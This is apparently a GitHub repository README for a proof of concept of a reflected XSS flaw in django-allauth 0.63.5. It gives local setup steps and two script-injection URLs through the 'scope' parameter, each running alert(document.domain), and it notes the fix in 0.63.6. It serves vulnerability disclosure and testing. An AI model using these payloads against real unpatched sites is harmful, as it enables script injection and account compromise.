Skip to content

stsewd/poc-xss-django-allauth

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
demo
demo
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
manage.py
manage.py
 
 
pyproject.toml
pyproject.toml
 
 
uv.lock
uv.lock
 
 

Repository files navigation

Proof of concept for a XSS vulnerability in django-allauth 0.63.5

You can read the full post here.

Requirements

  • Python
  • uv

Set up

$ git clone https://github.com/stsewd/poc-xss-django-allauth
$ cd poc-xss-django-allauth
$ uv run manage.py migrate
# Create a user to log into the application.
$ uv run manage.py createsuperuser
$ uv run manage.py runserver

Proof of concept

XSS in login page

  • While logged out, go to http://127.0.0.1:8000/accounts/login/?scope=</script><script>alert(document.domain)</script><script>

XSS in social connections page

  • Go to http://127.0.0.1:8000/accounts/login/
  • Log in with the user you created
  • Go to http://127.0.0.1:8000/accounts/3rdparty/?scope=</script><script>alert(document.domain)</script><script>

Try updating the project to use django-allauth 0.63.6, and repeat the steps to see that the vulnerability is fixed.

$ uv add django-allauth==0.63.6

About

Proof of concept of a XSS vulnerability in django-allauth 0.63.5

stsewd.dev/posts/xss-in-django-allauth-fb-provider/

Topics

poc

Resources

Readme

License

MIT license
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Contributors

Languages